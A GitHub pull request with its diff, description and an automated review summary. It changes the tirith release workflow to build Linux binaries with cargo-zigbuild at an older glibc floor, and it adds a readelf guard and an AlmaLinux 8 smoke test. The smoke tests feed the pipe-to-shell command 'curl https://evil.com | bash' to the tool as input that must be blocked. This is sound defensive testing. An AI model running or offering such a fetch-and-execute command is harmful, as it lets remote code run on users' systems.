### PR TITLE
fix(release): lower the linux-gnu glibc floor so binaries run on EL8 / Amazon Linux 2023

### DIFF
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -268,9 +268,24 @@ jobs:
           tmpdir=$(mktemp -d)
           tar xzf tirith-${{ matrix.target }}.tar.gz -C "$tmpdir"
           chmod +x "$tmpdir/tirith"
-          docker run --rm -v "$tmpdir:/t:ro" almalinux:8 /t/tirith --version
-          docker run --rm -v "$tmpdir:/t:ro" almalinux:8 \
-            sh -c '/t/tirith check -- "curl https://evil.com | bash" && exit 1 || true'
+          # Exit 0 already proves the binary linked and ran on glibc 2.28 (a
+          # missing GLIBC_2.x symbol aborts in ld.so before main). Assert the
+          # output too, matching the musl smoke test, so a binary that exits 0
+          # without actually running can't pass silently.
+          version_out=$(docker run --rm -v "$tmpdir:/t:ro" almalinux:8 /t/tirith --version)
+          echo "$version_out"
+          echo "$version_out" | grep -q '^tirith ' || {
+            echo "ERROR: 'tirith --version' did not run on AlmaLinux 8"
+            exit 1
+          }
+          # A known-bad command must be blocked (non-zero exit). Use an explicit
+          # if rather than `&& exit 1 || true` so a crash or loader abort on the
+          # check path fails the job instead of being swallowed.
+          if docker run --rm -v "$tmpdir:/t:ro" almalinux:8 \
+            /t/tirith check -- "curl https://evil.com | bash"; then
+            echo "ERROR: binary failed to block a pipe-to-shell command on AlmaLinux 8"
+            exit 1
+          fi
           rm -rf "$tmpdir"
 
       - name: Extract and test (Windows)

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -100,12 +100,17 @@ jobs:
           toolchain: stable
           targets: ${{ matrix.target }}
 
-      - name: Install cross-compilation tools (Linux aarch64 gnu)
-        if: matrix.target == 'aarch64-unknown-linux-gnu'
-        run: |
-          sudo apt-get update
-          sudo apt-get install -y gcc-aarch64-linux-gnu
-          echo "CARGO_TARGET_AARCH64_UNKNOWN_LINUX_GNU_LINKER=aarch64-linux-gnu-gcc" >> $GITHUB_ENV
+      # The linux-gnu artifacts must run on enterprise distros that ship an
+      # older glibc than the ubuntu-22.04 runner: RHEL/AlmaLinux/Rocky 8 are on
+      # glibc 2.28, while the runner links against 2.35. We build them with
+      # cargo-zigbuild, which uses Zig as the cross-linker and pins the glibc
+      # symbol floor (see the build step). Zig also cross-compiles aarch64 from
+      # the x86_64 runner, so the GCC aarch64 toolchain is no longer needed for
+      # the gnu target. Zig is pinned to 0.13.0 because newer releases (0.14+)
+      # mishandle the `.<glibc>` target suffix (cargo-zigbuild#363).
+      - name: Install Zig + cargo-zigbuild (Linux gnu)
+        if: endsWith(matrix.target, '-unknown-linux-gnu')
+        run: pip3 install cargo-zigbuild==0.19.8 ziglang==0.13.0
 
       - name: Install cross-compilation tools (Linux aarch64 musl)
         if: matrix.target == 'aarch64-unknown-linux-musl'
@@ -116,8 +121,35 @@ jobs:
           echo "AR_aarch64_unknown_linux_musl=aarch64-linux-gnu-ar" >> $GITHUB_ENV
           echo "CARGO_TARGET_AARCH64_UNKNOWN_LINUX_MUSL_LINKER=aarch64-linux-gnu-gcc" >> $GITHUB_ENV
 
+      # Two steps rather than one shell conditional: the Windows runner defaults
+      # to PowerShell, which cannot parse a bash `if`. The linux-gnu targets
+      # build with cargo-zigbuild at a pinned glibc floor (`.2.17`, EL7+); EL8's
+      # 2.28 is enforced by the next step. The version suffix does not change
+      # cargo's target dir, so staging and packaging are unchanged.
+      - name: Build release binary (Linux gnu, zig)
+        if: endsWith(matrix.target, '-unknown-linux-gnu')
+        run: cargo zigbuild --release --locked --target ${{ matrix.target }}.2.17 -p tirith
+
       - name: Build release binary
+        if: ${{ !endsWith(matrix.target, '-unknown-linux-gnu') }}
         run: cargo build --release --locked --target ${{ matrix.target }} -p tirith
+
+      # Guard against a dependency or toolchain bump silently raising the glibc
+      # floor again (the regression that broke tirith on AlmaLinux 8.10). readelf
+      # parses ELF version requirements for any architecture, so this covers both
+      # the x86_64 and aarch64 gnu artifacts.
+      - name: Verify glibc floor <= 2.28 (Linux gnu)
+        if: endsWith(matrix.target, '-unknown-linux-gnu')
+        run: |
+          set -euo pipefail
+          bin="target/${{ matrix.target }}/release/tirith"
+          max=$(readelf -V "$bin" | grep -oE 'GLIBC_[0-9.]+' | sort -uV | tail -n1)
+          echo "highest required glibc symbol: ${max:-none}"
+          if [ -n "$max" ] && [ "$(printf '2.28\n%s\n' "${max#GLIBC_}" | sort -V | tail -n1)" != "2.28" ]; then
+            echo "::error::$bin requires $max (newer than GLIBC_2.28); it will not run on RHEL/AlmaLinux 8"
+            exit 1
+          fi
+          echo "glibc floor OK (<= 2.28, runs on EL8)"
 
       # The aarch64 musl artifact ships for Android/Termux (Bionic libc cannot
       # run the glibc build). The x86_64 runner cannot execute an aarch64
@@ -223,6 +255,22 @@ jobs:
           "$tmpdir/tirith" doctor
           "$tmpdir/tirith" check -- "curl https://evil.com | bash" && exit 1 || true
           "$tmpdir/tirith" check -- "ls -la"
+          rm -rf "$tmpdir"
+
+      # The host smoke test above runs on the runner's glibc 2.35, so it cannot
+      # catch a raised floor. Prove the gnu binary actually runs on EL8 (glibc
+      # 2.28), the environment that originally failed with "GLIBC_2.29 not
+      # found" on AlmaLinux 8.10.
+      - name: Run on AlmaLinux 8 (glibc 2.28)
+        if: matrix.target == 'x86_64-unknown-linux-gnu'
+        run: |
+          set -euo pipefail
+          tmpdir=$(mktemp -d)
+          tar xzf tirith-${{ matrix.target }}.tar.gz -C "$tmpdir"
+          chmod +x "$tmpdir/tirith"
+          docker run --rm -v "$tmpdir:/t:ro" almalinux:8 /t/tirith --version
+          docker run --rm -v "$tmpdir:/t:ro" almalinux:8 \
+            sh -c '/t/tirith check -- "curl https://evil.com | bash" && exit 1 || true'
           rm -rf "$tmpdir"
 
       - name: Extract and test (Windows)


### PR DESCRIPTION
## Problem

The prebuilt `*-unknown-linux-gnu` binaries don't run on enterprise distros
with an older glibc. On AlmaLinux 8.10 (glibc 2.28):

```
$ ./tirith --version
/lib64/libm.so.6: version `GLIBC_2.29' not found (required by ./tirith)
```

Pinning builds to `ubuntu-22.04` (#25, #32) fixed the original 2.39 breakage
but only dropped the floor to 2.35, which still excludes RHEL/AlmaLinux/Rocky 8
(2.28) and Amazon Linux 2023 (2.34, the case @injust raised in #32).
ubuntu-20.04 runners were retired in April 2025, so the floor has to come from
the build, not the runner.

## Fix

Build the gnu targets with [cargo-zigbuild](https://github.com/rust-cross/cargo-zigbuild)
and pin the minimum glibc via the target suffix (`x86_64-unknown-linux-gnu.2.17`,
EL7+).

- The binary stays dynamically linked as before; only the glibc floor changes
  (no musl, no runtime behavior change).
- Zig cross-compiles aarch64 from the x86_64 runner, so the
  `gcc-aarch64-linux-gnu` toolchain is dropped for the gnu target.
- Output dir, staging, packaging, and asset names are unchanged, so no
  installer, Homebrew, or npm changes are needed.
- Zig is pinned to 0.13.0 (0.14+ mishandle the `.<glibc>` suffix,
  cargo-zigbuild#363).

## Verification

- A `readelf` step fails the build if any gnu artifact needs a glibc symbol
  newer than 2.28.
- A smoke test runs the x86_64 binary inside `almalinux:8` (glibc 2.28).

Validated end to end with a `workflow_dispatch` dry run (build + smoke-test, no
publish) on my fork: https://github.com/hellno/tirith/actions/runs/27946021765

## Alternatives

- Old-glibc build container (manylinux / Alma 8): the CentOS 7 repos are EOL and
  fragile now, and it complicates the aarch64 build.
- Static `x86_64-unknown-linux-musl`: a new target/asset that would need
  installers to prefer musl on old hosts, and static musl plus arboard's X11
  linking is a known footgun. Zigbuild keeps the existing artifact and is a
  smaller change.

Refs #25, #32.

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR fixes `*-unknown-linux-gnu` binaries failing on enterprise distros (RHEL/AlmaLinux/Rocky 8, Amazon Linux 2023) by replacing the GCC aarch64 cross-toolchain with `cargo-zigbuild` + `ziglang==0.13.0`, pinning the glibc symbol floor to 2.17 via the `.2.17` target suffix. A `readelf`-based post-build guard and an AlmaLinux 8 Docker smoke test are added to prevent the floor from silently regressing.

- **Build tool swap**: `pip3 install cargo-zigbuild==0.19.8 ziglang==0.13.0` replaces `gcc-aarch64-linux-gnu`; both x86_64 and aarch64 gnu targets are now cross-compiled by Zig, so the GCC toolchain install step is removed entirely.
- **Glibc guard**: A `readelf -V | grep GLIBC_ | sort -V` check runs after every gnu build and fails the job if any symbol newer than GLIBC_2.28 is found.
- **AlmaLinux 8 smoke test**: Added to the `smoke-test` job, running `--version` and a pipe-to-shell check inside an `almalinux:8` container to prove the binary actually executes on glibc 2.28.

<h3>Confidence Score: 4/5</h3>

Safe to merge; the approach is well-reasoned and validated end-to-end on a fork. Two minor gaps in the smoke-test step (unpinned Docker image tag, unvalidated `--version` output) leave a small blind spot but do not affect the shipped binary.

The core change — replacing GCC cross-compilation with cargo-zigbuild and pinning the glibc floor — is correct and the readelf guard provides a reliable CI regression check. The AlmaLinux 8 smoke test logic is sound. The two gaps are in test hygiene rather than in the build or the binary itself, so they don't affect what ships to users.

.github/workflows/release.yml smoke-test step (AlmaLinux 8 section) — unpinned Docker image and missing output assertion.

<h3>Important Files Changed</h3>

| Filename | Overview |
|----------|----------|
| .github/workflows/release.yml | Replaces gcc-aarch64-linux-gnu with cargo-zigbuild + ziglang==0.13.0 for linux-gnu targets, pins glibc floor to 2.17 via the .2.17 target suffix, adds a readelf-based glibc floor guard, and adds an AlmaLinux 8 Docker smoke test. Minor gaps: the AlmaLinux image is not pinned by digest, and the container --version output is not validated. |

</details>

<h3>Sequence Diagram</h3>

<a href="#gh-light-mode-only">

```mermaid
%%{init: {'theme': 'neutral'}}%%
sequenceDiagram
    participant R as Runner (ubuntu-22.04)
    participant Z as cargo-zigbuild + Zig 0.13.0
    participant B as Binary (tirith-*-linux-gnu)
    participant RE as readelf check
    participant AL as almalinux:8 container

    R->>Z: "pip3 install cargo-zigbuild==0.19.8 ziglang==0.13.0"
    R->>Z: cargo zigbuild --target x86_64-unknown-linux-gnu.2.17
    Z-->>B: ELF binary (glibc floor 2.17)
    R->>RE: "readelf -V | grep GLIBC_ | sort -V"
    RE-->>R: "max symbol <= GLIBC_2.28? Pass / Fail"

    Note over R,AL: smoke-test job (separate runner)
    R->>AL: docker run almalinux:8 /t/tirith --version
    AL-->>R: exit 0 (runs on glibc 2.28)
    R->>AL: docker run almalinux:8 sh -c tirith check blocked
    AL-->>R: exit 0 (dangerous cmd blocked)
```

</a>
<a href="#gh-dark-mode-only">

```mermaid
%%{init: {'theme': 'base', 'themeVariables': {"darkMode": true, "background": "#0d1117", "primaryColor": "#21262d", "primaryTextColor": "#e6edf3", "primaryBorderColor": "#8b949e", "lineColor": "#8b949e", "textColor": "#e6edf3", "edgeLabelBackground": "#161b22", "actorBkg": "#21262d", "actorBorder": "#8b949e", "actorTextColor": "#e6edf3", "actorLineColor": "#8b949e", "signalColor": "#8b949e", "signalTextColor": "#e6edf3", "noteBkgColor": "#373320", "noteBorderColor": "#d4a72c", "noteTextColor": "#f0e6c0", "labelBoxBkgColor": "#21262d", "labelBoxBorderColor": "#8b949e", "labelTextColor": "#e6edf3", "loopTextColor": "#e6edf3", "activationBkgColor": "#30363d", "activationBorderColor": "#8b949e"}}}%%
sequenceDiagram
    participant R as Runner (ubuntu-22.04)
    participant Z as cargo-zigbuild + Zig 0.13.0
    participant B as Binary (tirith-*-linux-gnu)
    participant RE as readelf check
    participant AL as almalinux:8 container

    R->>Z: "pip3 install cargo-zigbuild==0.19.8 ziglang==0.13.0"
    R->>Z: cargo zigbuild --target x86_64-unknown-linux-gnu.2.17
    Z-->>B: ELF binary (glibc floor 2.17)
    R->>RE: "readelf -V | grep GLIBC_ | sort -V"
    RE-->>R: "max symbol <= GLIBC_2.28? Pass / Fail"

    Note over R,AL: smoke-test job (separate runner)
    R->>AL: docker run almalinux:8 /t/tirith --version
    AL-->>R: exit 0 (runs on glibc 2.28)
    R->>AL: docker run almalinux:8 sh -c tirith check blocked
    AL-->>R: exit 0 (dangerous cmd blocked)
```

</a>

<sub>Reviews (1): Last reviewed commit: ["fix(release): build linux-gnu binaries a..."](https://github.com/sheeki03/tirith/commit/b7ad10a83f53039b944c32e5067779168e983d98) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=39008414)</sub>

> Greptile also left **2 inline comments** on this PR.

<!-- /greptile_comment -->